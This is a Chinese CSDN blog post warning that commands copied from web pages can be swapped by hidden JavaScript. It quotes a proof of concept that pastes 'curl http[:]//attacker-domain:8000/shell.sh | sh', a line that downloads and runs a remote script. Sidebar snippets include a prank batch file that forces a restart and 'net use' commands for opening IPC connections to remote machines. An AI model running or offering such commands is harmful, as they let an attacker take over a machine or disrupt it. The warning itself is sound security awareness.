从陌生网页上复制/贴上命令列要小心被黑

最新推荐文章于 2023-06-07 11:24:18 发布
最新推荐文章于 2023-06-07 11:24:18 发布
阅读量160 收藏
点赞数
文章标签: 恶意代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/suzhouzhongli/article/details/122306626
版权

安全研究人员警告,HTML页面上的命令列可能藏匿恶意程序码,开发者稍有不察直接复制贴上终端时,可能就让黑客得以于程序中植入后门。

复制粘贴要当心,恶意代码正在执行

一名安全研究人员近日警告,随手从网络上复制与贴上(Copy/Paste)命令列时要特别小心,因为黑客可能趁此骇进开发者的系统或应用程序。

Friedlander打造了一个概念性验证攻击手法,他设计一个假装可用来更新Ubuntu作业系统的命令列,该命令列显示的文字很简单,为「sudo apt update」,但当开发者复制它,并将它贴上记事本或终端时,它出现的却是「curl http[:]//attacker-domain:8000/shell.sh | sh 」,若是直接贴入终端,它将立即执行。

 这是因为Friedlander在此一HTML页面上藏匿了JavaScript程序码,而让开发者眼见的文字与贴上之后所呈现的内容完全不同。

Friedlander说,不管是新手或是熟练的开发者,都可能会从网络上复制命令列或部份程序码,但这是非常危险的行为,也许会让黑客直接于程序中植入后门,相关的攻击非常地简单,却可能带来极大的伤害,建议开发者应永远避免于终端贴上直接自网络上复制的命令列。

suzhouzhongli
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码雨代码源复制_快速实现《客帝国》代码雨,小白都能看得懂
weixin_39525617的博客
12-10 1万+
开源最前线(ID:OpenSourceTop) 猿妹综合整理看过《客帝国》的伙伴们相信都对里面的代码雨印象深刻,这种特效经常用在客攻击时的电脑动画,其实要实现这样一个特效并不难,不懂代码的小白按照说明操作也很容易实现。最近猿妹也在Github上发现了类似的项目,不仅可以实现《客帝国》的代码雨,还可以实现《康威生命游戏》(Conway’s Game of Life)的特效。该项目是由akino...
陌生网页交互行为分析(1)——奇怪的关闭按钮
03-03
我们在浏览网页的时候偶尔会遇到一些陌生网页交互行为,通常情况下它们并不会影响你的正常使用,之所以出现情况往往是因为,设计师在设计某个交互方式的时候,遇到了常用的交互模式无法解决的问题,因此会采用一种...
复制源代码
09-15
java开发(一)文本的复制 import java.awt.Toolkit; import java.awt.datatransfer.Clipboard; import java.awt.datatransfer.DataFlavor; import java.awt.datatransfer.StringSelection; import java.awt.datatransfer.UnsupportedFlavorException; import java.io.IOException; public class CopyAndPaste { public static void main(String[] args) { //copy(); //可以 在键盘上 ctrl + v paste(); } public static void copy(){ Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard(); //得到系统剪板 String text = "这是要拷贝的内容"; StringSelection selection = new StringSelection(text); clipboard.setContents(selection, null); } public static void paste(){ Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard(); DataFlavor flavor = DataFlavor.stringFlavor; if(clipboard.isDataFlavorAvailable(flavor)){//是否符合剪板的数据类型 try { System.out.println("此时剪版的数据是:" + clipboard.getData(flavor)); } catch (UnsupportedFlavorException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } } } }
css3实现客数字雨(复制可直接运行)
Dyz_397的博客
06-07 518
【代码】css3实现客数字雨(复制可直接运行)
伪装客代码
热门推荐
ProgramFirst的博客
06-27 10万+
新建文本文档,将以下代码复制在文档中,保存并将扩展名改为(.bat) cd ../ cd ../ color a sfc/scannow dir/s tree C: tree D: dir C: dir D: ping 192.168.31.1 ping baidu.com ping 360.cn chkdsk C:/f @echo 修复完成,即将重启 pause shutdown -r -t 10 ...
点击劫持、Self-XSS、复制劫持的组合攻击学习——XSS劫持
weixin_50464560的博客
08-10 1267
点击劫持 这一篇总结得很清楚也很通俗易懂(手动滑稽) https://blog.csdn.net/weixin_50464560/article/details/119562912 Self-XSS 一些网站为了用户体验着想会有这么一个功能,就是用户在提交信息失败并且需要返回去填的时候会帮你自动把之前填写的信息补全回来,这样就避免了用户的重新输入,节省了用户的时间。这是一个很好很人性化的功能,但是这种补全可能不那么被重视,所以很多网站也不会对输出进行过滤,这样就可能存在XS...
30分钟ES6从陌生到熟悉
02-24
回顾近两年的前端开发,复杂度确实在快速增加,近期不论从系统复杂度还是到前端开发人员数量应该达到了一个饱和值,换个方式说,没有ES6我们的前端代码依旧可以写很多复杂的应用,而ES6的提出更好的帮我们解决了很多...
普适计算中一种上下文感知的自适应可信模型
01-15
针对普适计算环境中涌现出的行为可信问题,提出了一种适合于普适计算网络环境的上下文感知的自适应可信模型CASATM,该可信模型能够自适应地对不同的服务提供不同层次的安全保障,能有效地对时间、地点、服务内容等上...
HTML客帝国代码雨
m0_72846951的博客
08-25 6955
HTML客帝国代码雨
客帝国
weixin_46648077的博客
11-24 6466
① 首先新建一个空白TXT文本文档,双击打开 ②输入代码: @echo off color 0a :start echo 1 2 3 4 5 g 5 6 7 g t 2 1 3 4 5 6 7 4 3 2 3 5 5 6 7 8 1 2 3 4 5 6 7 8 9 g 3 5 7 ping localhost -n 1 > null echo 1 4 5 6 7 8 9 4 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 2 3 4 5 6 7 8 9 1 1 3 4 5 6 7
客帝国代码雨
Welcome to loveuui's blog
05-24 2852
客帝国代码雨 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>NumberRain</title> <style type="text/css"> canvas{ display: block; } </style> </head> <body> <canva
网页特效应用二期(电脑新建一个文本文档复制改后缀名为.html就能用)
老陈的博客
12-15 602
本期特效应用有:1、客帝国代码雨,2、蝴蝶特效,3、旋转烟花,4、立体文字,5、小太阳与云 3、旋转烟花 4、立体文字 5、小太阳与云 觉得有意思的话,点个赞呗♥
97年的世界客编程大赛第一名的作品-Mekka 【代码+使用】
Coder的博客
03-12 5607
环境 win7系统 使用 1、把这段代码复制下来存为文本文档,命名为1.txt 2、再“运行”——CMD,在窗口中粘 debug<1.txt 3、回车 e100 33 f6 bf 0 20 b5 10 f3 a5 8c c8 5 0 2 50 68 13 1 cb e 1f be a1 1 bf 0 1 e11b 6 57 b8 11 1 bb 21 13 89 7 4b 4b 48 79 f9 ad 86 e0 8b c8 bd ff ff e8 20 e134 0 3d 0 1 74 1a 7f
命令小集
Gjqhs的博客
12-05 2305
net use $">\\ip\ipc$ " " /user:" " 建立IPC 空链接 net use $">\\ip\ipc$ "密码" /user:"用户名" 建立IPC 非空链接 net use h: $">\\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: $">\\ip\c$ 登陆后映射对方C:到本地为H: net use $">\\ip\ipc$ /del 删除IPC 链接 net use h: /del 删
用python实现代码雨(电影客帝国里的效果,代码可直接运行)
数据知道的博客
10-15 3万+
用python实现代码雨: # -*- coding:utf-8 -*- import random import pygame from pygame.locals import * from sys import exit PANEL_width = 1920 PANEL_highly = 1080 FONT_PX = 40 pygame.init() # 创建一个可视窗口, 如果不想全屏运行,可以把 FULLSCREEN 参数去掉 winSur = pygame.display.set_mode
客入侵效果网页html,满屏绿字滑下效果
weixin_43474701的博客
12-10 1万+
客入侵效果网页html代码 效果如下图: 想要改变绿色的字就把下面代码中的编程ID改成你想要的就行,复制代码粘文本文档,改后缀名为html即可。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <
你也可以这样屌到爆的敲代码当
X-rapido的专栏
05-12 10万+
你也可以这样屌到爆的敲代码当客!点击选中,你就随便敲吧!旁边的人一定认为:哥们你蓝翔出来的吧!   点进去后,按 F11 键全屏,然后开始装B,瞎按,就是这么牛B…   主站   http://fediafedia.com/neo/   http://fediafedia.com/neo/scp/index.html   http://fediafe
复制与粘,一知半解的编程
dawn0718的专栏
04-01 1553
  前面使用LayUI很快就完成了资产清查的小程序,接下来要在一个星期多完成一个招投标的小程序,内容也不复杂,就是给定不同的Word模板,然后管理员指定模板输入格式与内容,用户就可以据此来制定标书,这样用户操作方便快捷,省事而且标书也规范。   程序是不复杂,用户催得紧,就只能使用LayUI再来做一次。   LayUI挺优秀的,但已经不更新了,再使用就没有什么意思了,但时间紧没办法,Vus忘记得差不多了,到目前为止我也只接触了LayUI这一框架。   没想到今天就遭遇麻烦,又被虐了好长时间。   删
python屏幕数字符号雨(已验证)
Vertira的博客
03-11 3049
import pygame import random def main(): # 初始化pygame pygame.init() # 默认不全屏 fullscreen = False # 窗口未全屏宽和高 WIDTH, HEIGHT = 1100, 600 init_width, init_height = WIDTH, HEIGHT # 字块大小,宽,高 suface_height = 18 # 字体大小 .
那怎么与客户从陌生到熟悉需要注意什么
最新发布
06-10
与客户从陌生到熟悉的过程需要注意以下几点: 1.建立信任:首先要建立起客户对你的信任。在初次接触时,可以通过介绍自己、公司、产品等方式来让客户了解你和你的公司,然后要保证能够兑现承诺,提供高质量的服务和支持,让客户对你的诚信和专业度产生信任感。 2.了解客户需求:在与客户交流时,要注意倾听客户的需求和关注点,了解他们的痛点和问题,这样才能提供符合其需求的解决方案。在交流过程中,可以通过提问、回答问题、分享经验等方式来加深了解。 3.提供专业建议:在了解客户需求的基础上,根据自己的专业知识和经验,提供符合客户需求的解决方案和建议。这样可以让客户感受到你的专业能力和价值。 4.保持联系:在初次接触后,需要保持与客户的联系,关注其业务和需求变化,并及时提供相应的支持和服务。这样能够增强客户对你和公司的信任和忠诚度。 5.定期跟进:定期跟进客户,了解客户的满意度和反馈,及时调整自己的工作方式和策略,以提高客户的满意度和忠诚度。 总之,与客户从陌生到熟悉需要建立信任、了解客户需求、提供专业建议、保持联系和定期跟进等多方面的注意事项,以提高客户对自己和公司的认可和忠诚度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值